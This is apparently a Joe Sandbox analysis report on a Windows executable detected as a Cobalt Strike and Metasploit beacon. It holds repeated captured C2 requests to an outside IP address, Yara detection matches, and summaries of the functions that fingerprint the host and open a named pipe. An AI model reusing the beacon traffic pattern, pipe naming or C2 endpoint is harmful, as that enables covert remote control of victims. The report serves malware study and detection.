Oct 23, 2024 17:27:59.558159113 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:01.414793968 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:00 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 23, 2024 17:28:01.415935040 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:00 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 23, 2024 17:28:01.416425943 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.8	49849	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:01.535897017 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:02.440095901 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.8	49850	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:02.708583117 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:03.601550102 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.8	49851	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:03.722500086 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:04.599414110 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.8	49852	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:04.715565920 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:05.607338905 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.8	49853	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:05.739466906 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:06.622812986 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.8	49854	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:06.750047922 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:07.762600899 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.8	49855	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:07.893140078 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:08.785279989 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.8	49856	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:08.981128931 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:09.874308109 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.8	49857	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:09.995105982 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:10.898179054 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.8	49858	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:11.014548063 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:12.154958963 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.8	49859	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:12.277590036 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:13.210488081 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.8	49860	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:28:13.324081898 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:28:14.208570004 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:28:14 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	11:25:32
Start date:	23/10/2024
Path:	C:\Users\user\Desktop\2HSalvXIJE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\2HSalvXIJE.exe"
Imagebase:	0x400000
File size:	19'456 bytes
MD5 hash:	4B3D1C48C04C6187BA4FF2B1A55AB27D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	79%
Signature Coverage:	12.5%
Total number of Nodes:	352
Total number of Limit Nodes:	42

Executed Functions

Function 03A9E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 03A9E725

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

Part of subcall function 03AA7B38: _snprintf.LIBCMT ref: 03AA7CA5

_snprintf.LIBCMT ref: 03A9E7BD
_snprintf.LIBCMT ref: 03A9E7D4
HttpOpenRequestA.WININET ref: 03A9E818
HttpSendRequestA.WININET ref: 03A9E84A
InternetQueryDataAvailable.WININET ref: 03A9E87A
InternetCloseHandle.WININET ref: 03A9E898

Part of subcall function 03AA2D70: strchr.LIBCMT ref: 03AA2DD6
Part of subcall function 03AA2D70: _snprintf.LIBCMT ref: 03AA2E0C

Part of subcall function 03AA2C0C: strchr.LIBCMT ref: 03AA2C69
Part of subcall function 03AA2C0C: _snprintf.LIBCMT ref: 03AA2CB3

InternetReadFile.WININET ref: 03A9E8D4
InternetCloseHandle.WININET ref: 03A9E8F5

Strings

%s%s, xrefs: 03A9E7C9
*/*, xrefs: 03A9E6CB

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3536628738-856325523
Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction ID: 1f465059c05a55a296d4fe9c3c48cdd0e5f5bcae100a888b99c3341fca7fef11
Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction Fuzzy Hash: 1C61EE32710B8486EF10DF66E940BAAB7A9F785B98F444127DE8D6BB58DF38C505C740

Function 00401180 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 196
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00401258
malloc.MSVCRT ref: 00401322
strlen.MSVCRT ref: 00401345
malloc.MSVCRT ref: 00401351
memcpy.MSVCRT ref: 00401365
GetStartupInfoA.KERNEL32 ref: 00401463

Strings

@P@, xrefs: 00401231

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID: @P@
API String ID: 649803965-1136412694
Opcode ID: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
Instruction ID: 0837f65e99a2b31b617579b96e5607858f818787d00fb595da640d4b13c89ff1
Opcode Fuzzy Hash: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
Instruction Fuzzy Hash: FB7199B2601B0486EB259F56E99476A33A1F745B88F84803BEF49773A1DF7CC884C748

Function 03AA5E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

GetUserNameA.ADVAPI32 ref: 03AA5EAF
GetComputerNameA.KERNEL32 ref: 03AA5EC2
GetModuleFileNameA.KERNEL32 ref: 03AA5EDB
strrchr.LIBCMT ref: 03AA5EED
GetVersionExA.KERNEL32 ref: 03AA5F10
_snprintf.LIBCMT ref: 03AA5F9B

Strings

%s%s%s, xrefs: 03AA5F7F

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 1671524875-1891519693
Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction ID: 40a50717a59084cd64e4777d780ac0fb5935da35e70089926068bc4b4f88de8b
Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction Fuzzy Hash: 0741D03971078086EE09FB26AA1472FA795B78AFD0F484526EE961FB65DF3CC102C704

Function 03A91184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 03A911B8
CryptAcquireContextA.ADVAPI32 ref: 03A911DC
CryptGenRandom.ADVAPI32 ref: 03A911F0
CryptReleaseContext.ADVAPI32 ref: 03A91204

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 03A911A2, 03A911C6
(, xrefs: 03A911D4

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction ID: 635cc2a72f8838146718ad77a38f34cc3f6049ec88f9197cd85fbbcab63e1f65
Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction Fuzzy Hash: 24019E31710A4182FB10CF66E888759B7A6F7C8B84F98842ACA8987324CF78CA49C740

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32 ref: 0040167C
ConnectNamedPipe.KERNEL32 ref: 00401699
WriteFile.KERNEL32 ref: 004016BC
CloseHandle.KERNEL32 ref: 004016C9

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID:
API String ID: 2239253087-0
Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004017B9
SleepEx.KERNELBASE ref: 004017CD

Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784

GetTickCount.KERNEL32 ref: 004017FC
CreateThread.KERNEL32 ref: 00401885

Strings

p, xrefs: 00401821
%c%c%c%c%c%c%c%c%cMSSE-%d-server, xrefs: 0040185A
\, xrefs: 00401839
@@, xrefs: 004017AE
i, xrefs: 00401829
e, xrefs: 00401819
p, xrefs: 00401831
\, xrefs: 00401811
., xrefs: 00401841

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
API String ID: 3660650057-1020837823
